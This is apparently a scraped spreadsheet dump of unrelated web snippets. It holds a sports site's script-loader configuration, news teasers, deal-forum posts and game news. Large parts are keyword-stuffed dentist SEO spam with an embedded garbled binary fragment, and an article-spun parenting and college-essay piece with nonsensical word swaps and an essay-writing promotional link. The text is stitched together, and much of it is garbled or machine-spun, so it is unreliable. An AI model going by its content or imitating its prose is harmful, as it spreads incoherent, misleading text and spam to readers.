require.config(“baseUrl”:”https://sportsfly.cbsistatic.com/fly-418/bundles/sportsmediajs/js-build”,”config”:”version”:”fly/components/accordion”:”1.0″,”fly/components/alert”:”1.0″,”fly/components/base”:”1.0″,”fly/components/carousel”:”1.0″,”fly/components/dropdown”:”1.0″,”fly/components/fixate”:”1.0″,”fly/components/form-validate”:”1.0″,”fly/components/image-gallery”:”1.0″,”fly/components/iframe-messenger”:”1.0″,”fly/components/load-more”:”1.0″,”fly/components/load-more-article”:”1.0″,”fly/components/load-more-scroll”:”1.0″,”fly/components/loading”:”1.0″,”fly/components/modal”:”1.0″,”fly/components/modal-iframe”:”1.0″,”fly/components/network-bar”:”1.0″,”fly/components/poll”:”1.0″,”fly/components/search-player”:”1.0″,”fly/components/social-button”:”1.0″,”fly/components/social-counts”:”1.0″,”fly/components/social-links”:”1.0″,”fly/components/tabs”:”1.0″,”fly/components/video”:”1.0″,”fly/libs/easy-xdm”:”2.4.17.1″,”fly/libs/jquery.cookie”:”1.2″,”fly/libs/jquery.throttle-debounce”:”1.1″,”fly/libs/jquery.widget”:”1.9.2″,”fly/libs/omniture.s-code”:”1.0″,”fly/utils/jquery-mobile-init”:”1.0″,”fly/libs/jquery.mobile”:”1.3.2″,”fly/libs/backbone”:”1.0.0″,”fly/libs/underscore”:”1.5.1″,”fly/libs/jquery.easing”:”1.3″,”fly/managers/ad”:”2.0″,”fly/managers/components”:”1.0″,”fly/managers/cookie”:”1.0″,”fly/managers/debug”:”1.0″,”fly/managers/geo”:”1.0″,”fly/managers/gpt”:”4.3″,”fly/managers/history”:”2.0″,”fly/managers/madison”:”1.0″,”fly/managers/social-authentication”:”1.0″,”fly/managers/tealium”:”1.0″,”fly/utils/data-prefix”:”1.0″,”fly/utils/data-selector”:”1.0″,”fly/utils/function-natives”:”1.0″,”fly/utils/guid”:”1.0″,”fly/utils/log”:”1.0″,”fly/utils/object-helper”:”1.0″,”fly/utils/string-helper”:”1.0″,”fly/utils/string-vars”:”1.0″,”fly/utils/url-helper”:”1.0″,”libs/jshashtable”:”2.1″,”libs/select2″:”3.5.1″,”libs/jsonp”:”2.4.0″,”libs/jquery/mobile”:”1.4.5″,”libs/modernizr.custom”:”2.6.2″,”libs/velocity”:”1.2.2″,”libs/dataTables”:”1.10.6″,”libs/dataTables.fixedColumns”:”3.0.4″,”libs/dataTables.fixedHeader”:”2.1.2″,”libs/dateformat”:”1.0.3″,”libs/waypoints/infinite”:”3.1.1″,”libs/waypoints/inview”:”3.1.1″,”libs/waypoints/jquery.waypoints”:”3.1.1″,”libs/waypoints/sticky”:”3.1.1″,”libs/jquery/dotdotdot”:”1.6.1″,”libs/jquery/flexslider”:”2.1″,”libs/jquery/lazyload”:”1.9.3″,”libs/jquery/maskedinput”:”1.3.1″,”libs/jquery/marquee”:”1.3.1″,”libs/jquery/numberformatter”:”1.2.3″,”libs/jquery/placeholder”:”0.2.4″,”libs/jquery/scrollbar”:”0.1.6″,”libs/jquery/tablesorter”:”2.0.5″,”libs/jquery/touchswipe”:”1.6.18″,”libs/jquery/ui/jquery.ui.core”:”1.11.4″,”libs/jquery/ui/jquery.ui.draggable”:”1.11.4″,”libs/jquery/ui/jquery.ui.mouse”:”1.11.4″,”libs/jquery/ui/jquery.ui.position”:”1.11.4″,”libs/jquery/ui/jquery.ui.slider”:”1.11.4″,”libs/jquery/ui/jquery.ui.sortable”:”1.11.4″,”libs/jquery/ui/jquery.ui.touch-punch”:”0.2.3″,”libs/jquery/ui/jquery.ui.autocomplete”:”1.11.4″,”libs/jquery/ui/jquery.ui.accordion”:”1.11.4″,”libs/jquery/ui/jquery.ui.tabs”:”1.11.4″,”libs/jquery/ui/jquery.ui.menu”:”1.11.4″,”libs/jquery/ui/jquery.ui.dialog”:”1.11.4″,”libs/jquery/ui/jquery.ui.resizable”:”1.11.4″,”libs/jquery/ui/jquery.ui.button”:”1.11.4″,”libs/jquery/ui/jquery.ui.tooltip”:”1.11.4″,”libs/jquery/ui/jquery.ui.effects”:”1.11.4″,”libs/jquery/ui/jquery.ui.datepicker”:”1.11.4″,”shim”:”liveconnection/managers/connection”:”deps”:[“liveconnection/libs/sockjs-0.3.4″],”liveconnection/libs/sockjs-0.3.4″:”exports”:”SockJS”,”libs/setValueFromArray”:”exports”:”set”,”libs/getValueFromArray”:”exports”:”get”,”fly/libs/jquery.mobile-1.3.2″:[“version!fly/utils/jquery-mobile-init”],”libs/backbone.marionette”:”deps”:[“jquery”,”version!fly/libs/underscore”,”version!fly/libs/backbone”],”exports”:”Marionette”,”fly/libs/underscore-1.5.1″:”exports”:”_”,”fly/libs/backbone-1.0.0″:”deps”:[“version!fly/libs/underscore”,”jquery”],”exports”:”Backbone”,”libs/jquery/ui/jquery.ui.tabs-1.11.4″:[“jquery”,”version!libs/jquery/ui/jquery.ui.core”,”version!fly/libs/jquery.widget”],”libs/jquery/flexslider-2.1″:[“jquery”],”libs/dataTables.fixedColumns-3.0.4″:[“jquery”,”version!libs/dataTables”],”libs/dataTables.fixedHeader-2.1.2″:[“jquery”,”version!libs/dataTables”],”https://sports.cbsimg.net/js/CBSi/app/VideoPlayer/AdobePass-min.js”:[“https://sports.cbsimg.net/js/CBSi/util/Utils-min.js”],”map”:”*”:”adobe-pass”:”https://sports.cbsimg.net/js/CBSi/app/VideoPlayer/AdobePass-min.js”,”facebook”:”https://connect.facebook.net/en_US/sdk.js”,”facebook-debug”:”https://connect.facebook.net/en_US/all/debug.js”,”google”:”https://apis.google.com/js/plusone.js”,”google-platform”:”https://apis.google.com/js/client:platform.js”,”google-csa”:”https://www.google.com/adsense/search/async-ads.js”,”google-javascript-api”:”https://www.google.com/jsapi”,”google-client-api”:”https://apis.google.com/js/api:client.js”,”gpt”:”https://www.googletagservices.com/tag/js/gpt.js”,”mpx”:”libs/tpPdk”,”newsroom”:”https://c2.taboola.com/nr/cbsinteractive-cbssports/newsroom.js”,”recaptcha”:”https://www.google.com/recaptcha/api.js?onload=loadRecaptcha&amp;render=explicit”,”recaptcha_ajax”:”https://www.google.com/recaptcha/api/js/recaptcha_ajax.js”,”sharethrough”:”https://native.sharethrough.com/assets/sfp.js”,”supreme-golf”:”https://sgapps-staging.supremegolf.com/search/assets/js/bundle.js”,”tealium”:”//tags.tiqcdn.com/utag/cbsi/cbssportssite/prod/utag.js”,”taboola”:”https://cdn.taboola.com/libtrc/cbsinteractive-cbssports/loader.js”,”twitter”:”https://platform.twitter.com/widgets.js”,”video-utils”:”https://sports.cbsimg.net/js/CBSi/util/Utils-min.js”,”waitSeconds”:300); Original Source Follow us on Twitter The post NFL Week 6 odds, picks: Patriots beat up on Giants, Chiefs rebound against Texans, plus other best bets appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Iran has arrested an Iranian-British anthropologist and sentenced an American to death for alleged spying. Read more? Click here</t>
  </si>
  <si>
    <t>Gemma Sapwell</t>
  </si>
  <si>
    <t>A defamation trial is underway, with a high school principal suing five parents for comments they made on social media.</t>
  </si>
  <si>
    <t>GOOGLE will take to the stage in New York City today for its annual Made by Google hardware showcase. While proceedings are expected to be dominated by the firm’s flashy new Pixel 4 flagship, new connected home hardware and possibly the grand unveiling of a Pixel Watch, it seems the American firm could also be readying a new laptop to challenge Apple’s MacBook dubbed the Pixelbook Go. Here’s everything we know about it… Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Actor performed on The Tonight Show Starring Jimmy Fallon See full article at Independent.co.uk » The post Lupita Nyong’o brings out rapper alter ego and name-drops Beyoncé and Jay Z in freestyle verse appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Decluttering expert Sally Flower says that in 2019 a digital spring clean is just as important as wiping down the benchtops.</t>
  </si>
  <si>
    <t>More than 25,000 homes are without power across Perth as a strong spring storm bringing wind gusts of more than 100 kilometres per hour knocks trees and branches onto powerlines and turns off traffic lights across the city.</t>
  </si>
  <si>
    <t>shutuptakemymoney101</t>
  </si>
  <si>
    <t>Not sure if this has been posted yet or not, Coles are selling 1/2 price $40 Boost Mobile plan sim kits. A good time to switch if you have been thinking about it.</t>
  </si>
  <si>
    <t>Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Kitchener. We're the original doctor ratings site with over 2 million reviews. The staff used to be good and reasonable about 6 years ago. Now the front staff is. Number 1 Dental Clinic Near Kitchener Woman saves purse from snatchers in Manimajra – Shalini Modi, a resident of Manimajra, said she was going to a dental clinic near her house at 6pm. As she reached near gate. New NHS dental practice opens in Billingham – After 21 months of campaigning to increase the number of NHS dental places in the North East town, patients, local. Locate and compare Dental Laboratories in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Please enter what you're searching for Please enter. Our Dental Emergency Clinics specialize in providing excellent emergency care to Kitchener and Waterloo area. Many dental problems need to be addressed immediately to prevent the condition from worsening, which is why an emergency dental clinic. Locate and compare Dentists in Williamsburg Town Centre Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usua. However, with the increasing number of clinics in these countries and the availability of quality dental services at. Friendliest Dentist Near Kitchener Kid Friendly Dentist Near Kitchener Our pediatric dentists work with all types of kids. We provide a special program for autistic children that uses familiar routines for increased comfort. Preferred Dentist Near Kitchener Ontario Drew Monkman. Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated. 3 reviews of Sierra Springs Dental "These Guys are Incredible! I went in to book an appointment about 3 months ago, After years of neglect and avoiding a Dentist the time finally came to ' get a check up '. I look up reviews online. Best Dentist in Kitchener No Widgets found in the Sidebar Alt! No Widgets found in the Sidebar Alt! Dentist Cosmetic Dentist Near Kitchener February 1, 2019 The dental implants and prosthetics market is anticipated to grow with a significant. Holiday Brief: The final sprint – He will be joined by Liberal candidate for Kitchener—Conestoga Tim Louis and other candidates from the region. Finally, . has a 4.8 rating. I'm new to Waterloo and had this office recommended. It exceeded my expectations and I had a great experience. Everyone was so friendly and appointments were right on time. Dr. Morrison has been our family dentist. How to Make Your Local SEO Efforts More Effective? – In case you have a web page about finding dental clinics near me, you get more chances of being ranked for the particular phrase. 4. Last but not least, as most of the users use mobile devices for. The service side has also seen changes: Darryl Haus, maître d’ of. in box near the middle of the main building. The Bloom. Number 1 Dentist In Kitchener Ontario Find the best Dentist in Kitchener, ON. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local Dentist you are looking for. Province approves safe consumption site for Kitchener, Ont. – Health Minister Christine Elliott says the new site will address opioid addiction in Kitchener. in Ontario, and the first. Number 1 Dentist In Kitchener Ontario Very kind, patient and knowledgeable dentist! I believe she makes things as affordable as possible for families and even did a small job pro bono for my daughter a few years ago. Locate and compare Dentists. Healthcare jobs in Canada hiring NOW! See latest positions in the healthcare, wellness and senior living hospitality. Maxwell Management Group Canada. Best Dental Clinic In Kitchener Ontario OHIP+ Changes. The Ontario public drug program changed on April 1, 2019.; Ontario residents 24 years and under, covered by OHIP and a private plan with prescription drug coverage, are no longer eligible for OHIP+.; Submit your drug claims incurred on or after April 1, 2019 to your Health Plan insurer for reimbursement.; Click here to find out more. Find great local, shopping and travel deals at 50 to 90% off in Kitchener, ON. Three Yoga or Pilates Classes or Unlimited Yoga and Pilates Classes at Midtown Yoga (Up to 83% Off). Admission for One or Two to Bingemans Screampark (Up to 42% Off). C$15 for C$30 Worth of Lindt Chocolate at Lindt &amp; Sprüngli Canada . 2019-10-11 · Seeking a full-time or part-time Small Animal Veterinarian to work in a suburban area east of Buffalo, NY. Experienced as well as new graduates are welcome to apply. Selected candidate will enjoy a progressive professional work environment with great clientele. We offer a friendly work schedule, health insurance, 401k, generous continue education allowance and excellent salary. Most Popular Dentist Near Kitchener Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Kitchener. We're the original doctor ratings site with over 2 million reviews. The staff used to be good and reasonable about 6 years ago. Now the front staff is. The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and. Cosmetic Dentist In Kitchener Who We Are. Kitchener Dental Office. At the dental office of the Dr. Michael Bensky, we offer a vast variety of dental services and procedures. We offer family and cosmetic dentistry at our Kitchener. The Best Cosmetic Dentists in Kitchener Handpicked Top 3 Cosmetic Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust. Search or browse RateMDs for trusted reviews &amp; ratings on Ophthalmologists in Kitchener. We’re the original doctor ratings site with over 2 million reviews. A cosmetic dentist can easily correct chipped, cracked or irregularly shaped teeth with contouring. With no discomfort to you, we can reshape and correct your teeth in usually just one visit to our practice in Kitchener. Bonding Bonding uses a. The good news – cosmetic dentistry can help. As a top-rated dentist, Kitchener East Family Dental offers a complete array of cosmetic dentistry treatment and procedures to help you get the results you’re looking for, whether you want to correct. Best Cosmetic Dentists in Kitchener, ON – Arvanitis &amp; Associates Dentistry by Design, Waterloo Smiles Dentistry, Dawson Dental Centre, Solar Dental, King Street Dental Centre, Michael Bensky, DDS, Laurentian Dental Centre, Grand River Dental. Dr. Lee has practiced in the Waterloo and Kitchener area as an associate dentist since 2002 and opened her own practice at the current location in May 2008. Her involvement with a variety of dental associations and commitment to advanced dental. Search or browse RateMDs for trusted reviews &amp; ratings on Family Doctors / G.P.s in Kitchener. We’re the original doctor ratings site with over 2 million reviews. Our cosmetic dentist in Waterloo and Kitchener Dr. Karen J. Lee Dentistry offers comprehensive cosmetic dental solutions to take your smile to the next level. Our cosmetic dentist in Kitchener Waterloo offers: Teeth Whitening If your smile is. Kid Friendly Dental Clinic Near Kitchener Ontario 2010-11-23 · free new school home county online lyrics download video car city sale texas music de pictures florida hotel real state sex high mp3 center uk 2007 california movie. We will be displaying a ‘Memorial Tree’ at each NSP in the Western Sydney Local Health District. We are inviting anybody to take one of our paper hearts to write the name of a person who has been lost to an overdose to put on a tree branch of the ‘Memorial Tree’. Monarch Dentistry has several locations in Southern Ontario with many different dental treatments available, including root canals, children’s dentistry, teeth whitening, and sedation dentistry. At Monarch Dentistry, we are a patient-friendly de. 2017-07-08 · archive.today. webpage capture. Saved from PK ×^R9 META-INF/þÊPK Ö^R9ÖŠ-ýÀ@ META-INF/MANIFEST.MFe A ‚@. ï‚ÿa î’] of ‚ ¡ð¾éX :+»ãÁ ßh F×÷½÷íN®Ñ4àI–à¼±˜ˆXíÂ ÅU’öºzƒàŒáaÂ MPËãÈ} Èg¼ ›û€"7•³~ô ¬Ô6 òË© ’q"îoëè1ö _Q„º ¥‡ HyÝ Ð*?aš±ZU¿ûÅS ÖÖ±l ‰t2,ðÆÒŸwV³õ ó?Ïµ!Ždf±1¯Áiš Ùõ”ÉÿVálcZ¶³°øò0øPK Ö^R9. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. KW Dental is your family dentist in Kitchener and Waterloo, Best Dentist Near Kitchener Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently accepting new patients. Schedule. "In a car-dependent city, interfering with traffic is one of the best ways of interfering with. many of them waving flags. I’d almost given up on watering the planters that were past their best — what was I thinking of in spring. Reach him by mail c/o In the Garden, The Record, 160 King St. E., Kitchener, Ont., N2G 4E5. WELCOME TO CITY SMILES DENTISTRY – TRUSTED &amp; BEST DENTIST IN KITCHENER Dr. Rajdeep Gill Get the smile of your dreams! City Smiles Dentistry – We, the leading dentist in Kitchener, provides top-notch dental treatment to our patients. We offer. Best Dental Clinic In Kitchener Ontario Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Wate. What Are The Best CBD Oils? CBD has become a huge money maker, and there’s no shortage of companies willing to lighten your wallet. New companies are starting up all the time — and now that CBD has officially been removed from the DEA’s list of controlled substances, we are going to see many, many more people getting in on the action. Dawson provides over 25 convenient, modern and accessible locations all across southern ontario. Explore our locations below to learn more, schedule an appointment, or. Top Dentist In Kitchener (CTV News Kitchener) "I have cleaned my wife’s teeth and I was charged with sexual. "I can’t accept this as a person – not. He has supported the LNG Canada project, defending it by saying the owners consulted well with Indigenous communities and. Dentists In Kitchener The top rated &amp; reviewed dentists in Kitchener, ON. See below for which dentists are accepting new patients, their profile, credentials and clinic locations. First Capital’s “necessity-based” real estate strategy means that they focus on renting to doctor and dentist offices, She predicted that Trudeau’s Liberals will win at least a minority government so "voting for Green MPs is your very best. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the. Preferred Dentist In Kitchener Ontario Children come to realize that going to the dentist is fun and not at all scary, which allows them to develop healthy dental habits over time. At Smile Town, we understand that our Kitchener patients are busy and in need of reliable and efficient. Most Popular Dental Clinic Near Kitchener Bathurst / ˈ b æ θ ər s t / is a city in the Central Tablelands of New South Wales, Australia.It is about 200 kilometres (120 mi) west-northwest of Sydney and is the seat of the Bathurst Regional Council.Bathurst is the oldest inland settlement in Australia and had a population of 36,801 at June 2018. Bathurst is often referred to as the Gold Country as it was the site of the first gold. Find the Top Dental Hygienists in Kitchener, ON Enter your location so we can match you with dental hygienists near you Go. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo famili. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently accepting new patients. Schedule. See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. ‘Extremely unfortunate’: Perth-Wellington candidates hit with election sign vandalism, theft – Mitchell’s supporters took photos of signs scattered near Conestoga Lake back in September. and which candidate is best. Ali will officially open his dental practice in south Minneapolis near Lake Nokomis. The finishing touches are underway at. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, Westheights Dental Centre, de Man &amp; Höediono Dentistry, Le Nhan Nancy Denturist, Top Dental Clinic In Kitchener Ontario Number 1 Dental Clinic Near Kitchener Woman saves purse from snatchers in Manimajra – Shalini Modi, a resident of Manimajra, said she was going to a dental clinic near her house at 6pm. As she reached near gate. New NHS dental practice opens in Billingham – After 21 months of campaigning to increase the number of NHS dental places in the North East town, patients, local. Locate and compare Dental Laboratories in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Please enter what you're searching for Please enter. Our Dental Emergency Clinics specialize in providing excellent emergency care to Kitchener and Waterloo area. Many dental problems need to be addressed immediately to prevent the condition from worsening, which is why an emergency dental clinic. Locate and compare Dentists in Williamsburg Town Centre Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usua. However, with the increasing number of clinics in these countries and the availability of quality dental services at. Friendliest Dentist Near Kitchener Kid Friendly Dentist Near Kitchener Our pediatric dentists work with all types of kids. We provide a special program for autistic children that uses familiar routines for increased comfort. Preferred Dentist Near Kitchener Ontario Drew Monkman. Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated. 3 reviews of Sierra Springs Dental "These Guys are Incredible! I went in to book an appointment about 3 months ago, After years of neglect and avoiding a Dentist the time finally came to ' get a check up '. I look up reviews online. Best Dentist in Kitchener No Widgets found in the Sidebar Alt! No Widgets found in the Sidebar Alt! Dentist Cosmetic Dentist Near Kitchener February 1, 2019 The dental implants and prosthetics market is anticipated to grow with a significant. Holiday Brief: The final sprint – He will be joined by Liberal candidate for Kitchener—Conestoga Tim Louis and ot...</t>
  </si>
  <si>
    <t>The mother of a disabled boy says a recent cyber attack on hospitals in regional Victoria is just the latest problem for an under-resourced system.</t>
  </si>
  <si>
    <t>COMMENTARY Some Newcastle United fans fumed as goalkeeper Martin Dubravka remarked on the club’s current form ahead of the clash with Manchester United. The Magpies shot-stopper told Newcastle’s official website that his side were working even harder than before following the 5-0 loss to Leicester City and were doubling their efforts on the training ground in order for the positive... Source</t>
  </si>
  <si>
    <t>As announced at this year's MineCon, the global release of Minecraft Earth, the new augmented reality spin-off from Mojang's PC block builder, is just beginning. The mobile variant of Minecraft is now in early access in two main countries, and more will come in the future. Minecraft Earth has officially started taking players. If you are in New Zealand or Australia, you can now download the Early Access version of Minecraft Earth on iOS and Android. Building an interactive diorama, visiting sites that can be spotted to get equipment, making and merging with other players, as well as survival mode in single player mode are included in this first release. At the same time, the news posted on the official website revealed that demos would soon be available in Microsoft stores around the world. Therefore, if you are aware of your phone space or specifications, you can visit a Microsoft store to see if you want to play more. The United States, Canada, Sydney and London will be the first places to have, and the post promises more information, we kindly ask you to monitor this space. London and Seattle hosted a closed beta earlier this year. Installing from there in Australia and New Zealand to begin official deployment is a good way to spread the load among players, giving more people a taste while testing global systems. More than Minecraft on mobile, Minecraft Earth uses AR technology to bring the beloved game to life. Players can create, share and collaborate on their creations using the world around them as a backdrop and platform, as with the way Pokemon Go has integrated pocket monsters into the real world. Alas, nothing in the announcement of the anticipated access mentioned any possible publication on PC. Nevertheless, if you are in Australia and New Zealand, you can start building now in Minecraft Earth. INFO Buy now</t>
  </si>
  <si>
    <t>Q&amp;A: Dallas NBA 2K League hopeful believes he has the IQ to make the leap to the pros NEW YORK CITY — We continue our NBA 2K League offseason 2020 Draft prospect series … Get to know more about this NBA 2K League prospect. Original Source Follow us on Twitter The post Q&amp;A: Dallas NBA 2K League hopeful believes he has the IQ to make the leap to the pros appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>President Putin may have become the unwitting meat in a South China Sea sandwich.</t>
  </si>
  <si>
    <t>Best Dentists in Halton Hills, ON – Still Waters Dental Group, Dentistry On Sinclair, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Oksana M. Sawiak, DDS IMD. The Best 10 Veterinarians in Halton Hills, ON Showing 1-10 of 254 Halton Hills Pets Veterinarians All Filters $ $$ $$$ $$$$ Open Now Sort By Recommended Highest Rated Most Reviewed Cities More Cities Distance Bird's-eye View Driving (8 km.). substancial – Free ebook download as Text File (.txt), PDF File (.pdf) or read book online for free. contains some random words for machine learning natural language processing The Best 10 Walk-in Clinics near Georgetown, Halton Hills, ON Showing 1-10 of 27 Halton Hills Georgetown Health &amp; Medical Medical Clinics Walk-in Clinics All Filters $ $$ $$$ $$$$ Open Now Sort By Recommended Highest Rated Most Reviewed. Tips to finding Halton Hills ON dentists Get to know your dentist: The best way to find a new dentist in Halton Hills ON is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time. Statoil is an international energy company with operations in 34 countries. Building on more than 35 years of experience from oil and gas production on the Norwegian continental shelf, we are committed to accommodating the world’s energy needs in a responsible manner, applying technology and creating innovative business solutions. Best General Dentistry in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, King's Cove Family Dental, Trenton A W Denturist, Diana Dental, Pownall Janet, DDs – Still Waters Dental, Lefebvre. The Best 10 Dentists near Georgetown, Halton Hills, ON Showing 1-10 of 298 Halton Hills Georgetown Health &amp; Medical Dentists All Filters $ $$ $$$ $$$$ Open Now Sort By Recommended Highest Rated Most Reviewed Distance Bird's-eye View. Highest Rated Dental Clinic Near Halton Hills Ontario The Best 10 Veterinarians in Halton Hills, ON Showing 1-10 of 254 Halton Hills Pets Veterinarians All Filters $ $$ $$$ $$$$ Open Now Sort By Recommended Highest Rated Most Reviewed Cities More Cities Distance Bird's-eye View Driving (8 km.). Cosmetic Dentist Near Halton Hills Ontario Kid Friendly Dentist Near Halton Hills Ontario Fun Things 2010-11-23 · free new school home county online lyrics download video car city sale texas music de pictures florida hotel real state sex high mp3 center uk 2007 california movie. Preferred Dentist In Halton Hills Ontario The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to. Ontario Halton Hills Find the best Dentist in Halton Hills, ON. Discover Dentists real customer reviews and contact details, including Words – Free ebook download as Text File (.txt), PDF File (.pdf) or read book online for free.</t>
  </si>
  <si>
    <t>Local shares fall for second session with Afterpay sliding into bear market territory</t>
  </si>
  <si>
    <t>Cocobongo</t>
  </si>
  <si>
    <t>Came across this Liquorland Spend &amp; Save offer only for this weekend Additional discount via a cashback platform may also be available Available till 11:59 PM AEST 20/10/2019 Over 2200 products tagged including wine, beer &amp; spirits. Top brands including Penfolds, Corona, Verve Cliquot, Johnnie Walker etc</t>
  </si>
  <si>
    <t>HOW TO CERTAINLY BE A HELICOPTER MOTHER OR WITHOUT BEING Your HELICOPTER PARENT Which will sounds lovely, doesn’t them? How can you manifest as a helicopter father or mother without being some sort of helicopter parent or guardian? Stay involved yourself without overpowering. Encourage with out making judgments. Support devoid of rescuing. Not all helicopter parenting is harmful. Parent involvement is important into a successful university experience. Still too much involvement means you hindering your current student’s autonomy and voyage into adulthood. An up to date article in the Washington Publish discussed the bird parent challenge explaining the reason it happens a lot more parents can let go without overparenting: This type of parenting is the path things are these days for many people. Kids who have been lifted by mom and dad who viewed their every single move, examined their pas online by the hour, advocated your children endlessly and also kept these folks busy through event for you to activity to experience date will be tucked away within college. But that doesn’t suggest their mom and dad have release. They make theirselves known to colleges, professors, consultants and agents. And yes, college presidents. Possess shown there is a path to be utilized between parental involvement along with over-parenting. While parental direction can be a large benefit to help student being successful, students have to build self confidence by doing stuff on their own socially, academically plus emotionally. Students whose mother or jumps in the vehicle and contests to the institution to deal with a good roommate issue, a homesickness problem, and also problems with the main professor can be a student having trouble after graduation in the workplace. Learning how to clear up these concerns in higher education helps these products learn how to manage conflict along with self-advocate if they land their whole first employment. Parents just who over-parent had been hindering their student’s capacity survive right after college. How can mothers and fathers parent without over-parenting? Hear. Encourage. Assistance. Give tips. But in the conclusion, let your university student solve the matter. It’s understandable when a boy or girl cries contacting companies day after day in regards to roommate problem wanting to get in touch with the college and get involved. However better circumstance is to allow your student talk to the citizen assistant as well as resident representative. This gives the coed power above the situation plus confidence they’re able to solve their own problems. An additional notice: helicopter raising a child is not just swooping in to address problems. It might be calling, texting and mailing continuously to check out their day, their checks, their good friends, their roommates and every single college feel. Let your infant contact you. Assume that no info is good media and establish a regular conversation schedule, giving your child the liberty to be self-governing without steady supervision. This might include a few texts 7 days and a Skype or Facetime call on the main weekend. It’s important to understand that your son or daughter’s ability to adjust to college lifestyle means needed space in addition to time to build skills, will be, and freedom. COLLEGE ESSAY|ABOUT A COLLEGE ESSAY|WHY YOU SHOULD|OUR COMPANY TIPS FOR YOUNG PEOPLE (AND PARENTS) Summer is here and for these students who will be a man or woman next year, the exact dreaded college essay|about a college essay|why you should|our company looms inside distance. College students spend numerous hours staring at any blank piece of paper or a computer trading screen. What will you write about? How will you even begin? What topic is best? What are admissions police officers looking for while in the essay? Record of queries goes on basically. If you are looking just for advice and also help or only need some recommendations about how must, these guys really know what they are preaching about: College Essay Male, Essay Heck and Go Edge. Ethan Sawyer, the particular College Essay Dude , presents parents plus students plenty of ‘free stuff’ to help using the essay, very own statement, and supplemental essay. Essay Nightmare offers advice on the Common Software package essays, Institution of Colorado Essays, Faction for Connection Essays, and Apply Arizona essays which has a great blog site filled with extra tips likewise. Essay Border provides a lot of sample essay on their web-site (just to get ideas not necessarily for duplicating! ) plus a great blog page with useful information on the Common Practical application essay encourages. Most students just need some sort of starting place some jumping away point. These websites will provide outstanding ideas that assist. They are a great choice summer examining and exploration. And if most likely so prone, consider choosing one of them being an essay instructor. The cost is definitely affordable as well as the benefits (along with giving your student over to another to avoid typically the stress) will probably be well worth the price you pay. I wrote a great post for TeenLife Media: https://www.professionalessayhelp.com Tips on how to Write the Top College Essay . It is a step-by-step guide approach write the dissertation, along with means to help learners avoid piracy and help utilizing editing. My best advice: use the go as a program to give the school an inside check who you are. Your company give them a perception of what type of student you’ll be and you (much greater than words using a sheet for paper).</t>
  </si>
  <si>
    <t>In a long and impressive interview on Eurogamer, Jakub Szamalek, the main writer of The Witcher 3: Wild Hunt, is open on the development of CD Projekt Red's masterful role play. Szamalek tells some excellent stories, revealing that no one in the editorial team wanted to write the sex scenes of the title and that the emotionally charged dialogue of Geralt and Yennefer on Skellige had been played at the Using default fisherman character templates. In short, it seems like writing such a remarkable script takes a lot time and effort. The Witcher series has always focused on characters and dialogue, but writing for a linear game is very different from writing for an open world game. Szamalek says that the editorial team had no choice but to plan all the experience, going so far as to document all the narrative paths of paper hook-up. "We had a lot of paintings and trees, diagrams and post-it to try to paint a complete picture, but it was extremely difficult," he says. But there is one quote in particular that caught our attention. Szamalek added: "We were really worried about not having enough content, we were really worried about the lack of quests, dialogue sequences, lack of content … keep the player busy." It's crazy to think that was the case now that we know how gigantic the game is, but it shows how deeply perceptions can change when you are working on something. "Obviously, we got a lot of wrong, because the density of the experience is certainly not lacking, but it was so difficult to evaluate when the game was still created," Szamalek adds. "What people outside of the industry do not always appreciate, is that a game is built from many pieces and you do not see the final product before the therefore, it is difficult to foresee unforeseen problems. " Just reading this sentence stresses us. Can you believe there was a time when the people behind The Witcher 3 thought it was not big enough? Continue 